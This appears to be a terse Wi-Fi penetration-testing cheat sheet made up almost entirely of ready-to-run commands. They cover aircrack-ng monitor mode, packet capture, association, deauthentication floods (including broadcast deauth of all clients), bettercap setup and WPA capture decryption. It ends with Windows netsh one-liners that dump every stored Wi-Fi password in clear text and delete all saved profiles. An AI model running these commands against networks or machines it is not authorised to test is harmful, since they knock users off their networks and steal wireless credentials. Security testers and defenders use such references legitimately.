Basic stuff

iw list


Start chipset in monitor mode

First try to start your interface in monitor without doing a “check kill”

Ask NetworkManager to not manage your interface

nmcli dev set <interface> managed no

Monitor mode

airmon-ng check <wlan1>
airmon-ng check kill
airmon-ng start <wlan1> <channel> -w <out>
airmon-ng start <wlan1> --band <abg> 

Only show supplicants associated to a specific BSSID

airmon-ng start <wlan1> -c <channel> --bssid <bssid> -a 
Stop monitor mode
airmon-ng stop <wlan1mon>
service network-manager start
airodump-ng <wlan1mon>
airodump-ng <wlan1mon> -c <channel> --bssid <bssid> -w <out>


Download the zip
apt install golang libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
/opt/bettercap -eval "caplets.update; q"
/opt/bettercap -eval "caplets.update; ui.update; q"


/opt/bettercap -caplet "http-ui"

One packet for association

aireplay-ng -1 0 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>

Association with keep-alive

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>
aireplay-ng -0 <nb_deauth> -a <ap_mac> -c <supplicant_mac> <wlan1mon>

Deauthenticate with broadcast address

aireplay-ng -0 20 -a <ap_mac> -c FF:FF:FF:FF:FF:FF <wlan1mon>
Decrypt capture files

For WPA/WPA2 encryption, at least handshake packets 2-3 or 3-4 are necessary.

airdecap-ng -e <essid> -p <PSK> (-b <ap_mac>) <cap_file>


airtun-ng -a <ap_mac_source> --repeat (--bssid <ap_mac_source_filtering>) -i <mon0_source> <mon1_dest>

Get Wi-Fi passwords from a host

It does not need administrator privileges on W10. But the PSK can be protected in which case administrator privileges are required to get the clear text PSK.

Export all information in XML files in a folder

netsh wlan export profile folder=<C:\Windows\Temp> key=clear

Print known PSK

netsh wlan show profiles|Select-String -Pattern " User Profile"|ForEach-Object{echo $_.Line.split(':')[1].trim()}|ForEach-Object{netsh wlan show profiles name=$_ key=clear}|Select-String -Pattern "Key Content|S$"
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Delete profiles

netsh wlan show profiles
netsh wlan delete profile name=*